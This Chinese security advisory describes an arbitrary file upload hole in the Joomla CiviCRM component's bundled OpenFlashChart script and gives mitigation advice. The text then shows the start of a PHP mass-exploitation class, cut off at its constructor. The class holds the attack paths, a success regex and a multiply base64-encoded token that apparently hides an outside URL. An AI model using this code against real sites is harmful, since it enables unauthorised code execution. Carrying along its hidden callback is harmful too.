受影响系统:
Joomla! CiviCRM
描述:
BUGTRAQ ID: 59372
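Joomla CiviCRM是组织成员关系管理系统。
Joomla CiviCRM组件存在任意文件上传漏洞,攻击者可利用此漏洞上传任意文件到受影响系统,导致任意代码执行。从下文测试代码所用的路径看,问题出在组件捆绑的OpenFlashChart库的上传脚本php-ofc-library/ofc_upload_image.php上。作为缓解措施,可删除该脚本或限制对它的访问,并检查tmp-upload-images/目录下是否存在异常文件。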
<*来源:miyachung
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
// Remove PHP's execution time limit so the script is never stopped for running too long.
set_time_limit(0);
// Turn on output buffering; what is done with the buffer later is not visible in this excerpt.
ob_start();
class exploit
{
// Configuration and state of the proof-of-concept class. Only the declarations are
// visible in this excerpt, so the role of each property is inferred from its name and
// value and should be confirmed against the methods that follow.

// Web-relative directory inside the OpenFlashChart package bundled with the component;
// presumably where an uploaded file ends up. For defenders: unexpected files in this
// directory (script files in particular) are a strong indicator of compromise.
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
// Web-relative path of the bundled upload script, ending in an open "name=" query
// parameter. For defenders: requests for ofc_upload_image.php in web-server access logs
// are worth alerting on, and the script can be removed or blocked if it is not needed.
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
// No default value; the constructor signature lists a $filename parameter, which presumably fills it.
private $filename;
// No default value; presumably the site currently being processed (verify in the methods).
private $url;
// No default value; presumably the content or path of the file being sent (verify in the methods).
private $file_to_upload;
// Regular expression (case-insensitive, dot matches newlines) for the PHP notice text
// "Undefined variable: HTTP_RAW_POST_DATA"; by its name it is presumably matched against
// a server response to decide whether a request succeeded.
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
// No default value; the constructor signature lists a $thread parameter, which may fill it.
private $thread_maxsize;
// No default value; the constructor signature lists a $site_list parameter.
private $site_list;
// No default value; the constructor signature lists a $regex parameter, which may fill it.
private $file_regex;
// Local file name; presumably where results are written (verify in the methods).
private $save_file = "uploaded.txt";
// Fixed browser User-Agent string (Firefox 15 on Windows), presumably sent with every
// request. A static value like this can be used for log correlation, but it is trivial
// to change and therefore only a weak indicator.
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
// Presumably a per-request timeout in seconds.
private $timeout_sec = 20;
// NOTE(review): opaque hard-coded value. It is base64 text whose decoded form again ends
// in base64 padding, so it has been encoded more than once. Nothing in this excerpt shows
// what it is for. Layered-encoded constants in public proof-of-concept code can hide
// behaviour unrelated to the stated purpose; decode and inspect it offline before
// trusting or running this file.
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
// Magic number; its meaning is not established anywhere in this excerpt.
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)